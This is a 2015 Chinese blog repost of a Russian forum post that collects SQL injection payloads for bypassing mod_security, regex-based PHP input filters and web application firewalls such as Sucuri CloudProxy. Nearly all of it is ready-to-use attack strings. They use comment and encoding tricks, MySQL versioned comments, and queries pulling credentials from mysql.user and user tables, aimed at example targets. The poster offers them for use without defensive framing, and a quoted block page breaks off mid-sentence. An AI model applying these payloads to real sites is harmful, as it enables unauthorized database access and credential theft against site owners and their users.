IT博客汇 | [注入]PHP bypass mod

[注入]PHP bypass mod_security SQL

K8拉登哥哥发表于 2015-09-13 13:15:24

国外X论坛看到的不翻译了也看不懂ru 不会翻译
大家看注入语句就OK了只要测试能绕过就好东西

Комментарии + перевод каретки %0D%0A
Код:

http://www.modsecurity.org/testphp.vulnweb.com/artists.php?artist=0+div+1+union%23foo*%2F*bar%0D%0Aselect%23foo%0D%0A1%2C2%2Ccurrent_user

url-decode вариант:
Код:

http://www.modsecurity.org/testphp.vulnweb.com/artists.php?artist=0+div+1+union#foo*/*bar
select#foo
1,2,current_user

Комбинирование комментариев и управляющих символов (перевод каретки %0D%0A) Отбросив комментарии мы получаем запрос вида:
Код:

0 div 1 union select 1,2,current_user

Технология Unterminated Comments + MySQL Comment Extensions for conditional code execution.
Код:

hUserId=22768&FromDate=1&ToDate=1＇UNION/*!0SELECT user,2,3,4,5,6,7,8,9/*!0from/*!0mysql.user/*-&sendbutton1=Get+Statement

Код:

/*! MySQL-specific code */

Цитата:
In this case, MySQL Server parses and executes the code within the comment as it would any other SQL statement, but other SQL servers will ignore the extensions.
Внутри такого комментария можно указать условия выполнения, к примеру:
Код:

CREATE /*!32302 TEMPORARY */ TABLE t (a INT);

TEMPORARY - конструкция будет задействована на серверах чья версия 3.23.02 или выше.

Ссылки по теме:
8 примеров на eng как обходили в свое время mod_sec правила: https://www.trustwave.com/Resources/SpiderLabs-Blog/ModSecurity-SQL-Injection-Challenge--Lessons-Learned/
Mod_Security Bypass Login (CRS, SQL Injection) http://software-talk.org/blog/2015/02/mod_security-bypass-login-sql-injection/
https://github.com/SpiderLabs/owasp-modsecurity-crs/issues/37

Other PHP Filters
Интересные примеры с обходами различных фильтров основанных на "недодуманных" регулярных выражениях.

Обход фильтра and, or
Код:

PHP filter code:   preg_match(＇/(and|or)/i＇, $id)
Filtered injection:   1 or 1 = 1       1 and 1 = 1
Bypassed injection:   1 || 1 = 1       1 && 1 = 1

Обход and, or, union
Код:

PHP filter code:   preg_match(＇/(and|or|union)/i＇, $id)
Filtered injection:   union select user, password from users
Bypassed injection:   1 || (select user from users where user_id = 1) = ＇admin＇

Обход фильтра where
Код:

Filtered injection:   1 || (select user from users where user_id = 1) = ＇admin＇
Bypassed injection:   1 || (select user from users limit 1) = ＇admin＇

Обход фильтра limit
Код:

Filtered injection:   1 || (select user from users limit 1) = ＇admin＇
Bypassed injection:   1 || (select user from users group by user_id having user_id = 1) = ＇admin＇

Обход фильтра group by
Код:

PHP filter code:   preg_match(＇/(and|or|union|where|limit|group by)/i＇, $id)
Filtered injection:   1 || (select user from users group by user_id having user_id = 1) = ＇admin＇
Bypassed injection:   1 || (select substr(group_concat(user_id),1,1) user from users ) = 1

Обход фильтра select
Код:

PHP filter code:   preg_match(＇/(and|or|union|where|limit|group by|select)/i＇, $id)
Filtered injection:   1 || (select substr(group_concat(user_id),1,1) user from users) = 1
Bypassed injection:   1 || 1 = 1 into outfile ＇result.txt＇
Bypassed injection:   1 || substr(user,1,1) = ＇a＇

Обход фильтра ＇ (одинарная ковычка)
Код:

PHP filter code:   preg_match(＇/(and|or|union|where|limit|group by|select|\＇)/i＇, $id)
Filtered injection:   1 || (select substr(group_concat(user_id),1,1) user from users) = 1
Bypassed injection:   1 || user_id is not null
Bypassed injection:   1 || substr(user,1,1) = 0x61
Bypassed injection:   1 || substr(user,1,1) = unhex(61)

Обход фильтра hex
Код:

Filtered injection:   1 || substr(user,1,1) = unhex(61)
Bypassed injection:   1 || substr(user,1,1) = lower(conv(11,10,36))

Обход фильтра substr
Код:

Filtered injection:   1 || substr(user,1,1) = lower(conv(11,10,36))
Bypassed injection:   1 || lpad(user,7,1)

Обход фильтра white space (пробел)
Код:

PHP filter code:   preg_match(＇/(and|or|union|where|limit|group by|select|\＇|hex|substr|\s)/i＇, $id)
Filtered injection:   1 || lpad(user,7,1)
Bypassed injection:   1%0b||%0blpad(user,7,1)

Еще варианты:
Код:

+, %2B, %20, %09, %0d ,%0А, /**/, /*tuns*/

Обход фильтра "=" (знак равенства)
Код:

script.php?par=1 and substring(Version(),1,1)like(5)
script.php?par=1 and substring(Version(),1,1)not in(4,3)
script.php?par=1 and substring(Version(),1,1)in(4,3)

bypass Web Application Firewall (WAF)
Вставка комментариев в управляющие конструкции
Код:

http://victim.com/news.php?id=1+un/**/ion+se/**/lect+1,2,3--

Обход регистро-зависимых фильтров
Код:

http://victim.com/news.php?id=1+UnIoN/**/SeLecT/**/1,2,3--

Не рекурсивные фильтры:
Код:

http://victim.com/news.php?id=1+UNunionION+SEselectLECT+1,2,3--
http://victim.com/news.php?id=1+uni%0bon+se%0blect+1,2,3--

Двойной URL-Encode
Код:

http://victim.com/news.php?id=1%252f%252a*/union%252f%252a /select%252f%252a*/1,2,3%252f%252a*/from%252f%252a*/us

以下waf
Sucuri WebSite Firewall - CloudProxy - Access Denied
What is going on?
You are not allowed to access the requested page. If you are the site owner, please open a ticket in our support page if you think it was caused by an error: https://support.sucuri.net. If you are not the owner of the web site, you can contact us at soc@sucuri.net. Also make sure to include the block details (displayed below), so we can better troubleshoot the error.
Block details
    Your IP: [ip]
    URL: [урль]
    Your Browser: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:35.0) Gecko/20100101 Firefox/35.0
    Block ID: SQLi71
    Block reason: SQL injection was detected and blocked.
    Time: Tue, 24 Feb 2015 18:24:19 -0500
    Server ID: cp93
Sucuri CloudProxy
CloudProxy is a WebSite Firewall from Sucuri. It stands between your site and the rest of the world and protects against attacks, malware infections, DDOS, brute force attempts and mostly anything that can harm it.
Not onl

Обходится так: union/*123*/select